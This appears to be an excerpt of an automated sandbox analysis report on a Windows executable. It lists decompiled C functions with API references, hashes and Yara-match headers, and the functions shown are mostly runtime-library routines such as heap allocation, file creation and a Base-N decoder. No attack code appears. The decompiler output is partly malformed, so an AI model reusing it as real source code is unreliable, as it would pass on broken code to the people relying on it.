                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CallFilterFunc@8
                    • String ID:
                    • API String ID: 4062629308-0
                    • Opcode ID: 5c41925958f0bdc93d3d29517acc5a4d947d28ebe073c974a7dd0105985868e5
                    • Instruction ID: 6cffa6f6b407e598d06e8f197b63ccb97c62cb2e527f0f5363f84a2c9d3d6cb9
                    • Opcode Fuzzy Hash: 5c41925958f0bdc93d3d29517acc5a4d947d28ebe073c974a7dd0105985868e5
                    • Instruction Fuzzy Hash: 96212631A1021B86DB196B7D8C0436E3651AF9533CF25433DE7229F2F0DB7886078742
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E013C5927(unsigned int __ebx, signed int* __ecx) {
                    				signed int _t29;
                    				void* _t33;
                    				unsigned int _t35;
                    				signed int _t36;
                    				signed int* _t37;
                    				unsigned int _t39;
                    				signed int _t41;
                    				signed int _t45;
                    				signed int* _t46;
                    				void* _t47;
                    
                    				_t37 = __ecx;
                    				_t35 = __ebx;
                    				_push(0xc);
                    				E013F272D(E01415C35);
                    				_t46 = _t37;
                    				 *(_t47 - 0x18) = _t46;
                    				_t45 =  *(_t47 + 8) | 0x0000000f;
                    				if(_t45 <= 0xfffffffe) {
                    					 *(_t47 - 0x14) = 3;
                    					_t35 = _t46[5];
                    					_t39 = _t35 >> 1;
                    					if(_t39 > _t45 /  *(_t47 - 0x14)) {
                    						_t33 = 0xfffffffe;
                    						if(_t35 > _t33 - _t39) {
                    							_t45 = 0xfffffffe;
                    						} else {
                    							_t45 = _t39 + _t35;
                    						}
                    					}
                    				} else {
                    					_t45 =  *(_t47 + 8);
                    				}
                    				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                    				_t15 = _t45 + 1; // 0xff
                    				_t29 = E013C57A6(_t35, _t15, 1, 1); // executed
                    				_t36 =  *(_t47 + 0xc);
                    				 *(_t47 - 0x14) = _t29;
                    				if(_t36 != 0) {
                    					if(_t46[5] < 0x10) {
                    						_t41 = _t46;
                    					} else {
                    						_t41 =  *_t46;
                    					}
                    					if(_t36 != 0) {
                    						E013F5310(_t29, _t41, _t36);
                    					}
                    				}
                    				_t30 = E013C6118(_t46, 1, 0);
                    				if(_t46 != 0) {
                    					_t30 =  *(_t47 - 0x14);
                    					 *_t46 =  *(_t47 - 0x14);
                    				}
                    				_t46[5] = _t45;
                    				_t46[4] = _t36;
                    				if(_t46[5] >= 0x10) {
                    					_t46 =  *_t46;
                    				}
                    				 *((char*)(_t46 + _t36)) = 0;
                    				return E013F269C(_t30);
                    			}














                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catch
                    • String ID:
                    • API String ID: 3886170330-0
                    • Opcode ID: c593e5c6d5b910b1817840aa0b61344233f13ca06e22a458e22bbdfbe276b026
                    • Instruction ID: b6d6a5b79af37df8c1e526ace20f6f47625489593232159e177cd5a9c542dccd
                    • Opcode Fuzzy Hash: c593e5c6d5b910b1817840aa0b61344233f13ca06e22a458e22bbdfbe276b026
                    • Instruction Fuzzy Hash: 28210871B15306DBEB20CF5CC8807AEB7B5AB56B38F10065DD6926B2C0DBB0BD448792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E013C853F(intOrPtr* __ecx, void* __eflags) {
                    				void* _t34;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr _t45;
                    				intOrPtr* _t46;
                    				void* _t48;
                    
                    				_t36 = __ecx;
                    				_push(0x14);
                    				E013F272D(E0141603E);
                    				_t46 = _t36;
                    				 *((intOrPtr*)(_t48 - 0x14)) = _t46;
                    				_push(_t46);
                    				E013C380D(_t48 - 0x20);
                    				 *((intOrPtr*)(_t48 - 4)) = 0;
                    				if( *((char*)(_t48 - 0x1c)) != 0) {
                    					__eflags =  *((intOrPtr*)(_t48 + 0x10));
                    					if(__eflags >= 0) {
                    						_t45 =  *((intOrPtr*)(_t48 + 0xc));
                    						if(__eflags > 0) {
                    							L8:
                    							 *((char*)(_t48 - 4)) = 1;
                    							_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t46 + 4)) + _t46 + 0x38)))) + 0x24))( *((intOrPtr*)(_t48 + 8)), _t45,  *((intOrPtr*)(_t48 + 0x10)));
                    							__eflags = _t34 -  *((intOrPtr*)(_t48 + 0xc));
                    							if(_t34 !=  *((intOrPtr*)(_t48 + 0xc))) {
                    								L10:
                    								_push(4);
                    								_pop(0);
                    							} else {
                    								__eflags = _t45 -  *((intOrPtr*)(_t48 + 0x10));
                    								if(_t45 !=  *((intOrPtr*)(_t48 + 0x10))) {
                    									goto L10;
                    								}
                    							}
                    							 *((intOrPtr*)(_t48 - 4)) = 0;
                    						} else {
                    							__eflags = _t45;
                    							if(_t45 > 0) {
                    								goto L8;
                    							}
                    						}
                    					}
                    				} else {
                    					_push(4);
                    					_pop(0);
                    				}
                    				_t39 =  *((intOrPtr*)( *_t46 + 4)) + _t46;
                    				if(0 != 0) {
                    					_t44 =  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc);
                    					E013C6548(_t39,  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc),  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc), 0);
                    				}
                    				E013C3EFD(_t48 - 0x20);
                    				return E013F269C(_t46);
                    			}










                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 013C8546
                      • Part of subcall function 013C380D: __EH_prolog3.LIBCMT ref: 013C3814
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3H_prolog3_catch
                    • String ID:
                    • API String ID: 1882928916-0
                    • Opcode ID: 1c37700e7b1dc4fb43a168095650d936f06599dc2ea9329a735bdb3c7c07c1ce
                    • Instruction ID: 842ff987243862e290c2bc4dccd8c39de96c567ba91ddcb6b69cb3ba7ffa0b31
                    • Opcode Fuzzy Hash: 1c37700e7b1dc4fb43a168095650d936f06599dc2ea9329a735bdb3c7c07c1ce
                    • Instruction Fuzzy Hash: 2F115EB1A00205EFDB11CF59C980AAEBBB1BF68B18F14809EF6055B255C7B1DE41CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0140A039(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				char _v8;
                    				char _v12;
                    				void* _v16;
                    				intOrPtr _v20;
                    				char _v32;
                    				void* _t25;
                    
                    				E01409DF5( &_v32, _a8);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				if(_v12 != 0) {
                    					_t25 = E0141201B( &_v8, _a4, _v20, _a12, 0x180); // executed
                    					if(_t25 != 0) {
                    						goto L1;
                    					}
                    					 *0x143a39c =  *0x143a39c + 1;
                    					asm("lock or [eax], ecx");
                    					 *((intOrPtr*)(_a16 + 8)) = 0;
                    					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                    					 *((intOrPtr*)(_a16 + 4)) = 0;
                    					 *_a16 = 0;
                    					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                    					return _a16;
                    				}
                    				L1:
                    				return 0;
                    			}










                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: 77aba2f8a017cb0816ef7870424a96cdc15c9ca8259a136a4d1503109ee6654b
                    • Instruction ID: 41bf1e61945827a808569f6888e3b4991cac62adc88488e6532d7133f0e7f9d4
                    • Opcode Fuzzy Hash: 77aba2f8a017cb0816ef7870424a96cdc15c9ca8259a136a4d1503109ee6654b
                    • Instruction Fuzzy Hash: CE1148B190420AAFCB06DF59E94099B7BF5EF48304F10406AF808AB351D631E911CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140D9CC(void* __esi, void* __eflags) {
                    				intOrPtr _v12;
                    				void* __ecx;
                    				char _t16;
                    				void* _t17;
                    				void* _t26;
                    				void* _t28;
                    				void* _t30;
                    				char _t31;
                    				void* _t33;
                    				intOrPtr* _t35;
                    
                    				_push(_t26);
                    				_push(_t26);
                    				_t16 = E014009B2(_t26, 0x40, 0x30); // executed
                    				_t31 = _t16;
                    				_v12 = _t31;
                    				_t28 = _t30;
                    				if(_t31 != 0) {
                    					_t2 = _t31 + 0xc00; // 0xc00
                    					_t17 = _t2;
                    					__eflags = _t31 - _t17;
                    					if(__eflags != 0) {
                    						_t3 = _t31 + 0x20; // 0x20
                    						_t35 = _t3;
                    						_t33 = _t17;
                    						do {
                    							_t4 = _t35 - 0x20; // 0x0
                    							E014070F5(_t28, __eflags, _t4, 0xfa0, 0);
                    							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                    							 *_t35 = 0;
                    							_t35 = _t35 + 0x30;
                    							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                    							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                    							 *((char*)(_t35 - 0x24)) = 0xa;
                    							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                    							 *((char*)(_t35 - 0x22)) = 0;
                    							__eflags = _t35 - 0x20 - _t33;
                    						} while (__eflags != 0);
                    						_t31 = _v12;
                    					}
                    				} else {
                    					_t31 = 0;
                    				}
                    				E014012E1(0);
                    				return _t31;
                    			}














                    APIs
                      • Part of subcall function 014009B2: HeapAlloc.KERNEL32(00000008,?,00000000,?,01406AB6,00000001,00000364,?,?,?,013FDB3F,013FF169,?,?,013C957D,?), ref: 014009F3
                    • _free.LIBCMT ref: 0140DA38
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: AllocHeap_free
                    • String ID:
                    • API String ID: 1080816511-0
                    • Opcode ID: dca9c4499f65b42ca210b7a17f4ad6c9324c80dd895054d5063701e4b8e7dbcd
                    • Instruction ID: 2e4ba341dd07af8e2c5466184c8a6bdfb4e3899594aa8b475203414edf77710c
                    • Opcode Fuzzy Hash: dca9c4499f65b42ca210b7a17f4ad6c9324c80dd895054d5063701e4b8e7dbcd
                    • Instruction Fuzzy Hash: 8601FE725043455BE326CFABD881A5AFBE9FB95370F25063EE5C4932C0E630A845C774
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013C8014(intOrPtr* __ecx, void* __eflags) {
                    				void* _t33;
                    				intOrPtr* _t38;
                    				intOrPtr _t40;
                    				intOrPtr _t43;
                    				intOrPtr* _t50;
                    				void* _t51;
                    				void* _t54;
                    				void* _t55;
                    
                    				_t38 = __ecx;
                    				_push(0x20);
                    				E013F26C2(E01415FCB);
                    				_t50 = _t38;
                    				_push(_t50);
                    				E013C380D(_t51 - 0x14);
                    				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                    				_t40 =  *((intOrPtr*)( *_t50 + 4));
                    				if(( *(_t40 + _t50 + 0xc) & 0x00000006) == 0) {
                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + _t50 + 0x38)))) + 0x28))(_t51 - 0x2c,  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)),  *((intOrPtr*)(_t51 + 0x10)), 2);
                    					_t33 =  *((intOrPtr*)(_t51 - 0x24)) +  *((intOrPtr*)(_t51 - 0x2c));
                    					_t43 =  *((intOrPtr*)(_t51 - 0x20));
                    					asm("adc ecx, [ebp-0x28]");
                    					_t54 = _t33 -  *0x141ef68; // 0xffffffff
                    					if(_t54 == 0) {
                    						_t55 = _t43 -  *0x141ef6c; // 0xffffffff
                    						if(_t55 == 0) {
                    							_t49 =  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002;
                    							E013C6548( *((intOrPtr*)( *_t50 + 4)) + _t50,  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002,  ==  ?  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 6 :  *( *((intOrPtr*)( *_t50 + 4)) + _t50 + 0xc) | 0x00000002, 0);
                    						}
                    					}
                    				}
                    				E013C3EFD(_t51 - 0x14);
                    				return E013F269C(_t50);
                    			}












                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C801B
                      • Part of subcall function 013C380D: __EH_prolog3.LIBCMT ref: 013C3814
                      • Part of subcall function 013C6548: __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$Exception@8Throw
                    • String ID:
                    • API String ID: 2489616738-0
                    • Opcode ID: 327b5033d281cab5f5bfd93d72b6ff42efd5f04aede9c5688e844c01390a1c51
                    • Instruction ID: 2ff2704d52347e18cb106c12781dc29038a32665ed7b071cdc6fa391a288326d
                    • Opcode Fuzzy Hash: 327b5033d281cab5f5bfd93d72b6ff42efd5f04aede9c5688e844c01390a1c51
                    • Instruction Fuzzy Hash: 7A112734600204EFDB15DB68C8A5FAEB7B1BF58718F14844CE9066B295C772EE42CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E013FDCE4(void* __ecx, intOrPtr _a4) {
                    				signed int _t13;
                    				signed int _t24;
                    				signed int _t25;
                    				intOrPtr _t27;
                    
                    				_t27 = _a4;
                    				if(_t27 == 0) {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					return E013FDA61() | 0xffffffff;
                    				}
                    				_push(_t24);
                    				_t25 = _t24 | 0xffffffff;
                    				if(( *(_t27 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                    					_t13 = E013FDDDA(_t27); // executed
                    					_t25 = _t13;
                    					E01407497(_t27);
                    					if(E0140776D(E01407888(_t27)) >= 0) {
                    						if( *(_t27 + 0x1c) != 0) {
                    							E014012E1( *(_t27 + 0x1c));
                    							 *(_t27 + 0x1c) =  *(_t27 + 0x1c) & 0x00000000;
                    						}
                    					} else {
                    						_t25 = _t25 | 0xffffffff;
                    					}
                    				}
                    				E0140790D(_t27);
                    				return _t25;
                    			}








                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4efe7531f495a3f0dabcdd4042de1fe4d13a4e15b846d9e638e0e89e05fb189
                    • Instruction ID: 9ac50238f7b8366ff768f56537d8480218b66f9085428c5e1c9a8d1eb091e2a3
                    • Opcode Fuzzy Hash: e4efe7531f495a3f0dabcdd4042de1fe4d13a4e15b846d9e638e0e89e05fb189
                    • Instruction Fuzzy Hash: FCF0283261061597DA233AEF9C0CF5A36988FB237DF10073EF664975E0CA74E402C692
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E013CD970(void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                    				char* _v8;
                    				char _v12;
                    				signed int _v16;
                    				void* _t7;
                    				signed int _t11;
                    				intOrPtr* _t22;
                    				void* _t26;
                    				void* _t28;
                    				void* _t30;
                    
                    				_t18 = _a4;
                    				_push(0x10);
                    				_t7 = E013FF293(_a4); // executed
                    				_t28 = _t26 - 0xc + 8;
                    				if(_t7 != 0) {
                    					L3:
                    					return _t7;
                    				} else {
                    					while(1) {
                    						_t22 = E013F18B4(0);
                    						_t30 = _t28 + 4;
                    						if(_t22 == 0) {
                    							break;
                    						}
                    						E013F18B4(_t22);
                    						 *_t22();
                    						_push(0x10);
                    						_t7 = E013FF293(_t18);
                    						_t28 = _t30 + 0xc;
                    						if(_t7 == 0) {
                    							continue;
                    						} else {
                    							goto L3;
                    						}
                    						goto L10;
                    					}
                    					asm("xorps xmm0, xmm0");
                    					_v12 = 0x141c954;
                    					asm("movq [esp+0x10], xmm0");
                    					_v8 = "bad allocation";
                    					E013F4EC6( &_v12, 0x1431644);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_t11 = _v16;
                    					if(_t11 != 0) {
                    						_t6 = (_t11 & 0xfffffffc) - 4; // 0x142e25c, executed
                    						_t11 = L013FDB4D( *_t6); // executed
                    					}
                    					return _t11;
                    				}
                    				L10:
                    			}













                    APIs
                      • Part of subcall function 013F18B4: std::_Lockit::_Lockit.LIBCPMT ref: 013F18DD
                      • Part of subcall function 013F18B4: std::_Lockit::~_Lockit.LIBCPMT ref: 013F1905
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD9D8
                    Yara matches
                    Similarity
                    • API ID: Lockitstd::_$Exception@8Lockit::_Lockit::~_Throw
                    • String ID:
                    • API String ID: 2653793986-0
                    • Opcode ID: 6e154564f2b1628754a4a1737feafdb966f3b1f135f652b126a1d91fa3600e3f
                    • Instruction ID: 116a57bd0d325ef33926155322c87f7cf0648985158a2aae87872d463f1fd288
                    • Opcode Fuzzy Hash: 6e154564f2b1628754a4a1737feafdb966f3b1f135f652b126a1d91fa3600e3f
                    • Instruction Fuzzy Hash: 1DF0B43AD4031666D220FAA96C427DBBF994FA5A18F04063EFF4866210F770A54991E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E013C7158(void* __ecx, void* __edx) {
                    				void* _t11;
                    				void* _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    
                    				_t26 = __edx;
                    				_t20 = __ecx;
                    				_push(8);
                    				E013F26C2(E0141601B);
                    				_t27 = _t20;
                    				if( *((intOrPtr*)(_t27 + 0x4c)) != 0) {
                    					L3:
                    					_t11 = 0;
                    					__eflags = 0;
                    				} else {
                    					_push( *((intOrPtr*)(_t28 + 0x10)));
                    					_push( *((intOrPtr*)(_t28 + 0xc)));
                    					_t13 = E013F17E2( *((intOrPtr*)(_t28 + 8))); // executed
                    					_t32 = _t13;
                    					if(_t13 == 0) {
                    						goto L3;
                    					} else {
                    						E013C5CF0(_t27, _t13, 1);
                    						_push(_t28 - 0x14);
                    						_t16 = E013C6ECF(_t27);
                    						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    						_push(_t16);
                    						E013C5E31(_t27, E013C22F0(_t26, _t32));
                    						E013C3EAF(_t28 - 0x14);
                    						_t11 = _t27;
                    					}
                    				}
                    				return E013F269C(_t11);
                    			}











                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C715F
                      • Part of subcall function 013C6ECF: __EH_prolog3.LIBCMT ref: 013C6ED6
                      • Part of subcall function 013C22F0: __EH_prolog3_GS.LIBCMT ref: 013C22F7
                      • Part of subcall function 013C22F0: std::_Lockit::_Lockit.LIBCPMT ref: 013C2304
                      • Part of subcall function 013C22F0: std::locale::_Getfacet.LIBCPMT ref: 013C2323
                      • Part of subcall function 013C22F0: std::_Lockit::~_Lockit.LIBCPMT ref: 013C2381
                    Yara matches
                    Similarity
                    • API ID: H_prolog3Lockitstd::_$GetfacetH_prolog3_Lockit::_Lockit::~_std::locale::_
                    • String ID:
                    • API String ID: 3290716268-0
                    • Opcode ID: 73ceb27997ebf59a62de5eff082623fdd6ac6c3629b0428893460b2829d9a260
                    • Instruction ID: 18d94a75518db542648865c29bfe84d28d00cc384df4613db7d2791bd8b2ae14
                    • Opcode Fuzzy Hash: 73ceb27997ebf59a62de5eff082623fdd6ac6c3629b0428893460b2829d9a260
                    • Instruction Fuzzy Hash: 7EF05EB1A10116ABDF15FB78CC18BAE766AAF74A18F00442DE905A6290DFB5DE048B61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C1039
                      • Part of subcall function 013CA4F0: new.LIBCMT ref: 013CA597
                      • Part of subcall function 013EA4F0: CryptReleaseContext.ADVAPI32(?,00000000,00000001), ref: 013EA580
                      • Part of subcall function 013F243E: __onexit.LIBCMT ref: 013F2444
                    Yara matches
                    Similarity
                    • API ID: ContextCryptH_prolog3Release__onexit
                    • String ID:
                    • API String ID: 2658822964-0
                    • Opcode ID: 304b89e8e23068c874648ece7f950403fc3e903ec4bd1dd3389b7e80c50d4c95
                    • Instruction ID: 72ff210ae412b1938ba12204b83439916959badeb9d5a50468aafe11c4cf5ab5
                    • Opcode Fuzzy Hash: 304b89e8e23068c874648ece7f950403fc3e903ec4bd1dd3389b7e80c50d4c95
                    • Instruction Fuzzy Hash: 81D05E3578131392D925B368882A72E6161ABE4A3DF50544DA3103F3E4DFF589400391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNEL32(00000000,00000000,?,01411D9B,?,?,00000000,?,01411D9B,00000000,0000000C), ref: 01411A4E
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: da5af344b3c06e484297ebc37713c5445c6197a3a8b32397c5bb351d31872be6
                    • Instruction ID: 715d980bdd1952778004b5d915f0511671bec37a5bd2d8bca4a759a083ab8aba
                    • Opcode Fuzzy Hash: da5af344b3c06e484297ebc37713c5445c6197a3a8b32397c5bb351d31872be6
                    • Instruction Fuzzy Hash: 72D06C3200024DBBDF128E84DD06EDA3FAAFB48714F114000BA1866020C736E821AB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapAlloc.KERNEL32(00000008,?,00000000,?,01406AB6,00000001,00000364,?,?,?,013FDB3F,013FF169,?,?,013C957D,?), ref: 014009F3
                    Yara matches
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: bf9c352d3a60b805163d5e7956bdb4c80fb539927570eb7640cf337391c56ed2
                    • Instruction ID: de80285a4966332b91903d4624f92323e440d14f67ec3fc78bdcc11fd1f6e346
                    • Opcode Fuzzy Hash: bf9c352d3a60b805163d5e7956bdb4c80fb539927570eb7640cf337391c56ed2
                    • Instruction Fuzzy Hash: 40F0E932541126A6FB235A6B8915B7B3F59AF907F0B144233F908EB2F4CA70E80146A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    Yara matches
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: 562df0a24b203f73f6111a8807d77fdd4432dc689c4927a954e27ef6bf3fd2f4
                    • Instruction ID: a4a0e76b298dba61d71fa95a52d3c85b99b25e23397bd377e68ad3dbb3f8f5ed
                    • Opcode Fuzzy Hash: 562df0a24b203f73f6111a8807d77fdd4432dc689c4927a954e27ef6bf3fd2f4
                    • Instruction Fuzzy Hash: B7E030351011169AF723266B58057AB2B599F51FA4B150132EA05D6AF0DA74D80186A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 82%
                    			E013E8FB0(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
                    				char _v12;
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				void* _v28;
                    				char _v32;
                    				char _v36;
                    				char _v44;
                    				void* _v48;
                    				char _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				void* _v76;
                    				char _v80;
                    				char _v88;
                    				char _v89;
                    				signed char _v90;
                    				char _v92;
                    				intOrPtr* _v124;
                    				char _v144;
                    				signed int _v148;
                    				intOrPtr* _v228;
                    				char _v240;
                    				char _v248;
                    				char _v252;
                    				char _v256;
                    				intOrPtr _v260;
                    				char _v268;
                    				char _v272;
                    				char _v276;
                    				char _v280;
                    				char _v284;
                    				intOrPtr _v288;
                    				char _v296;
                    				char _v300;
                    				char _v304;
                    				void _v308;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t138;
                    				signed int _t139;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t156;
                    				signed int _t163;
                    				signed int _t168;
                    				char _t173;
                    				char _t175;
                    				void* _t184;
                    				signed int _t189;
                    				signed int _t190;
                    				signed int _t193;
                    				signed int _t198;
                    				signed int _t203;
                    				void* _t213;
                    				signed int* _t214;
                    				signed int _t215;
                    				char* _t222;
                    				char* _t226;
                    				signed int _t230;
                    				void* _t235;
                    				void* _t237;
                    				signed int _t252;
                    				signed int _t253;
                    				signed int _t261;
                    				signed int _t268;
                    				void* _t272;
                    				void* _t278;
                    				signed int _t280;
                    				void* _t282;
                    				intOrPtr _t284;
                    				intOrPtr* _t285;
                    				char* _t286;
                    				signed int _t292;
                    				void* _t294;
                    				void* _t295;
                    				void* _t297;
                    				void* _t298;
                    				signed int* _t300;
                    				signed int _t301;
                    				char* _t302;
                    				intOrPtr* _t303;
                    				signed int _t308;
                    				signed int _t310;
                    				signed int _t311;
                    				void* _t313;
                    				signed int _t314;
                    				signed int _t315;
                    				void* _t330;
                    				void* _t332;
                    
                    				_push(0xffffffff);
                    				_push(E01417A40);
                    				_push( *[fs:0x0]);
                    				_t314 = _t313 - 0x44;
                    				_t138 =  *0x1435234; // 0x78d9f939
                    				_t139 = _t138 ^ _t310;
                    				_v20 = _t139;
                    				_push(_t139);
                    				 *[fs:0x0] =  &_v16;
                    				_t213 = __ecx;
                    				_t284 = _a4;
                    				E013E8D30(__ecx, _t284, "BaseN_Decoder", "DecodingLookupArray", __ecx + 0x18);
                    				_t300 = __ecx + 0x20;
                    				E013CED50(__ecx, _t284, "BaseN_Decoder", "Log2Base", _t300);
                    				_t301 =  *_t300;
                    				if(_t301 <= 0 || _t301 >= 8) {
                    					_v68 = 0xf;
                    					_v72 = 0;
                    					_v88 = 0;
                    					E013C64B7( &_v88, __eflags, "BaseN_Decoder: Log2Base must be between 1 and 7 inclusive", 0x39);
                    					asm("xorps xmm0, xmm0");
                    					_v12 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v12 = 1;
                    					_t222 =  &_v48;
                    					_v64 = 0x141a7b8;
                    					_v52 = 1;
                    					_v28 = 0xf;
                    					_v32 = 0;
                    					_v48 = 0;
                    					E013C63D3(_t222, _t272,  &_v88, 0, 0xffffffff);
                    					_v12 = 0;
                    					_v64 = 0x141a97c;
                    					E013F4EC6( &_v64, 0x1430adc);
